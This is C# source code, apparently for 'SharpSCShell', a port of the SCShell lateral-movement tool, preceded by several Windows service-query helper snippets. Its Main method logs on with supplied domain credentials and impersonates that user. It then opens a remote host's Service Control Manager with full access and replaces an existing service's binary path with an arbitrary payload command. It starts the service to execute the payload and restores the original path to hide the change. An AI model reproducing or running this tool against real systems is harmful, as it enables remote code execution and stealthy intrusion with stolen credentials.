public SCManager(string serviceName) { if (scmHandle == IntPtr.Zero) { scmHandle = OpenSCManager(null, null, ACCESS_MASK.GENERIC_READ); if (scmHandle == IntPtr.Zero) throw new ExternalException("Open Service Manager Error"); } IntPtr svcHandle = OpenService(scmHandle, serviceName, SERVICE_ACCESS.SERVICE_QUERY_CONFIG | SERVICE_ACCESS.SERVICE_QUERY_STATUS); if (svcHandle == IntPtr.Zero) throw new ExternalException("Open Service Error"); uint bufSize = 0; QueryServiceConfig(svcHandle, IntPtr.Zero, 0, out bufSize); IntPtr qscsHandle = Marshal.AllocHGlobal((int)bufSize); QueryServiceConfig(svcHandle, qscsHandle, bufSize, out bufSize); qscs = (QueryServiceConfigStruct)Marshal.PtrToStructure( qscsHandle, typeof(QueryServiceConfigStruct)); Marshal.FreeHGlobal(qscsHandle); CloseServiceHandle(svcHandle); }
public QueryService(IntPtr qscPtr) { QueryServiceConfigStruct qscs = new QueryServiceConfigStruct(); qscs = (QueryServiceConfigStruct) Marshal.PtrToStructure(qscPtr, new QueryServiceConfigStruct().GetType()); serviceInfo = new ServiceInfo(); serviceInfo.binaryPathName = Marshal.PtrToStringAuto(qscs.binaryPathName); serviceInfo.dependencies = Marshal.PtrToStringAuto(qscs.dependencies); serviceInfo.displayName = Marshal.PtrToStringAuto(qscs.displayName); serviceInfo.loadOrderGroup = Marshal.PtrToStringAuto(qscs.loadOrderGroup); serviceInfo.startName = Marshal.PtrToStringAuto(qscs.startName); serviceInfo.errorControl = qscs.errorControl; serviceInfo.serviceType = qscs.serviceType; serviceInfo.startType = qscs.startType; serviceInfo.tagID = qscs.tagID; Marshal.FreeCoTaskMem(qscPtr); }
private static ServiceInfo GetServiceInfo(string ServiceName) { if (ServiceName.Equals("")) throw new NullReferenceException("ServiceName must contain a valid service name."); IntPtr sc_handle = OpenSCManager(null, null, STANDARD_RIGHTS_REQUIRED); if (sc_handle.ToInt32() == 0) throw new NullReferenceException(); IntPtr service = OpenService(sc_handle, ServiceName, SERVICE_QUERY_CONFIG); if (service.ToInt32() <= 0) throw new NullReferenceException(); int bytesNeeded = 5; QueryServiceConfigStruct qscs = new QueryServiceConfigStruct(); IntPtr qscPtr = Marshal.AllocCoTaskMem(0); int retCode = QueryServiceConfig(service, qscPtr, 0, ref bytesNeeded); if (retCode == 0 && bytesNeeded == 0) { throw new Win32Exception(); } else { qscPtr = Marshal.AllocCoTaskMem(bytesNeeded); retCode = QueryServiceConfig(service, qscPtr, bytesNeeded, ref bytesNeeded); if (retCode == 0) { throw new Win32Exception(); } qscs.binaryPathName = IntPtr.Zero; qscs.dependencies = IntPtr.Zero; qscs.displayName = IntPtr.Zero; qscs.loadOrderGroup = IntPtr.Zero; qscs.startName = IntPtr.Zero; qscs = (QueryServiceConfigStruct) Marshal.PtrToStructure(qscPtr, new QueryServiceConfigStruct().GetType()); } ServiceInfo serviceInfo = new ServiceInfo(); serviceInfo.binaryPathName = Marshal.PtrToStringAuto(qscs.binaryPathName); serviceInfo.dependencies = Marshal.PtrToStringAuto(qscs.dependencies); serviceInfo.displayName = Marshal.PtrToStringAuto(qscs.displayName); serviceInfo.loadOrderGroup = Marshal.PtrToStringAuto(qscs.loadOrderGroup); serviceInfo.startName = Marshal.PtrToStringAuto(qscs.startName); serviceInfo.errorControl = qscs.errorControl; serviceInfo.serviceType = qscs.serviceType; serviceInfo.startType = qscs.startType; serviceInfo.tagID = qscs.tagID; Marshal.FreeCoTaskMem(qscPtr); return serviceInfo; }
static void Main(string[] args) { Console.WriteLine(); Console.WriteLine("=============== SharpSCShell --> Revised at Rcoil (C# version) =============== "); Console.WriteLine(); if (args.Length < 2) { Console.WriteLine("SharpSCShell.exe target service payload domain username password"); Environment.Exit(0); } string target = args[0]; string ServiceName = args[1]; string payload = args[2]; string domain = args[3]; string username = args[4]; string password = args[5]; const int LOGON32_LOGON_NEW_CREDENTIALS = 9; const int LOGON32_PROVIDER_DEFAULT = 0; const uint SERVICE_NO_CHANGE = 0xffffffff; const int SERVICE_DEMAND_START = 0x00000003; const int SERVICE_ERROR_IGNORE = 0x00000000; IntPtr phToken = IntPtr.Zero; int bytesNeeded = 5; Console.WriteLine("[*] Trying to connect to {0}", target); bool bResult = false; if (username != null) { Console.WriteLine("[*] Username was provided attempting to call LogonUser"); bResult = LogonUser(username, domain, password, LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, ref phToken); if (!bResult) { Console.WriteLine("[!] LogonUser failed. Error:{0}", GetLastError()); Environment.Exit(0); } } bResult = ImpersonateLoggedOnUser(phToken); if (!bResult) { Console.WriteLine("[!] ImpersonateLoggedOnUser failed. Error:{0}", GetLastError()); Environment.Exit(0); } IntPtr SCMHandle = OpenSCManager(target, null, (uint)SCM_ACCESS.SC_MANAGER_ALL_ACCESS); if (SCMHandle == IntPtr.Zero) { Console.WriteLine("[!] OpenSCManagerA failed! Error:{0}", GetLastError()); Environment.Exit(0); } Console.WriteLine("[*] SC_HANDLE Manager 0x{0}", SCMHandle); Console.WriteLine("[*] Opening {0} Service ....", ServiceName); IntPtr schService = OpenService(SCMHandle, ServiceName, ((uint)SERVICE_ACCESS.SERVICE_ALL_ACCESS)); Console.WriteLine("[*] SC_HANDLE Service 0x{0}", schService); QueryServiceConfigStruct qscs = new QueryServiceConfigStruct(); IntPtr qscPtr = Marshal.AllocCoTaskMem(0); int retCode = QueryServiceConfig(schService, qscPtr, 0, ref bytesNeeded); if (retCode == 0 && bytesNeeded == 0) { Console.WriteLine("[!] QueryServiceConfig failed to read the service path. Error:{0}", GetLastError()); } else { Console.WriteLine("[*] LPQUERY_SERVICE_CONFIGA need {0} bytes", bytesNeeded); qscPtr = Marshal.AllocCoTaskMem(bytesNeeded); retCode = QueryServiceConfig(schService, qscPtr, bytesNeeded, ref bytesNeeded); qscs.binaryPathName = IntPtr.Zero; qscs = (QueryServiceConfigStruct)Marshal.PtrToStructure(qscPtr, new QueryServiceConfigStruct().GetType()); } string originalBinaryPath = Marshal.PtrToStringAuto(qscs.binaryPathName); Console.WriteLine("[*] Original service binary path \"{0}\"", originalBinaryPath); Marshal.FreeCoTaskMem(qscPtr); bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, payload, null, null, null, null, null, null); if (!bResult) { Console.WriteLine("[!] ChangeServiceConfigA failed to update the service path. Error:{0}", GetLastError()); Environment.Exit(0); } Console.WriteLine("[*] Service path was changed to \"{0}\"", payload); bResult = StartService(schService, 0, null); uint dwResult = GetLastError(); if (!bResult && dwResult != 1053) { Console.WriteLine("[!] StartServiceA failed to start the service. Error:{0}", GetLastError()); Environment.Exit(0); } else { Console.WriteLine("[*] Service was started"); } bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, originalBinaryPath, null, null, null, null, null, null); if (!bResult) { Console.WriteLine("[!] ChangeServiceConfigA failed to revert the service path. Error:{0}", GetLastError()); Environment.Exit(0); } else { Console.WriteLine("[*] Service path was restored to \"{0}\"", originalBinaryPath); } }